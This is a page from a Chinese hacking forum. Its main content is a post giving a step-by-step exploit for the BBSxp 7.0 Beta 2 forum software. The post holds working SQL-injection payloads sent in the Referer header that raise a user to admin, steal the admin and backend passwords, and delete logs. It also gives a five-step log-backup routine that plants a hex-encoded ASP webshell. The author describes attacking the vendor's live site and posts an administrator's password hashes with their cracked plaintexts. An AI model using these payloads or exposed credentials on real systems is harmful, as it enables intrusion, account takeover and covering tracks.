首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 漏洞利用

再暴BBSxp 7.0 Beta 2漏洞


http://www.gipsky.com/
作者:TTFCT



漏洞存在于文件setup.asp中



第一部份



注册->登陆->发帖->编辑->抓包->改包->提升为管理员->更改后台密码->登陆后台->WEBSHELL



这里我设密码为:ttfct1 ,NC提交,成功提为管理员。用密码:ttfct1登陆后台。成功获取WEBSHELL,成功备份,获取WEBSHELL 成功。



WEBSHELL获取的两种方法

一:后台上传增加 htr

二:log备份,共4步




第二部份



检测官方网站

我已注册好了,用户是sina147

注册->登陆->发帖->编辑->抓包

为了不引起管理员注意,我们直接获取管理员密码和后台密码,然后登陆后台。



不好意思,刚才出了点问题,停电了。继续,抓包,修改,我查了一下,yuzi就是管理员了。



yuzi的密码5D4D89BEA718BEE10686FB053E86F13B->080532779

后台登陆密码:531BC3E862F67DC2BAA871EABDE81A4F->080532449



登陆后台

本文件请求的物理路径 D:\www\bbs.yuzi.net\Admin_other.asp 有了这个,就有机会拿WEBSHELL了

后面的动画就不作了,大家发挥吧。



OVER

************************************************************************************

提升为管理员:

Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserRoleID=1 where username='sina'--



获取管理员密码(即一次密码):

Referer: http://127.0.0.1','', '','修改帖子成功');update bbsxp_users set UserMail= (select userpass from bbsxp_users where username='yuzi') where username='sina147'



获取后台密码(即二次密码):

Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserMail=(select top 1 adminpassword from bbsxp_sitesettings) where username='sina147'



更改后台管理密码(二次密码)

Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='sina')



删除日志:

Referer: http://127.0.0.1','','','修改帖子成功');delete from bbsxp_log where username='sina147'



LOG备份

备份地址:C:\Inetpub\wwwroot\ttfct.asp



第一步

create table [dbo].[shit_tmp] ([cmd] [image])



第二步

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate



第三步

insert into [shit_tmp](cmd) values(0x3C25657865637574652872657175657374282261222929253E)



第四步

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C0049006E00650074007000750062005C0077007700770072006F006F0074005C00740074006600630074002E00610073007000 backup log @a to disk=@s with init,no_truncate



第五步

Drop table [shit_tmp]

Tags: bbsxp[/code]
[/code]
<< 阿里巴巴支付宝远程代码执行漏洞-0DAY 改写asp木马,谈变形与隐身! >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8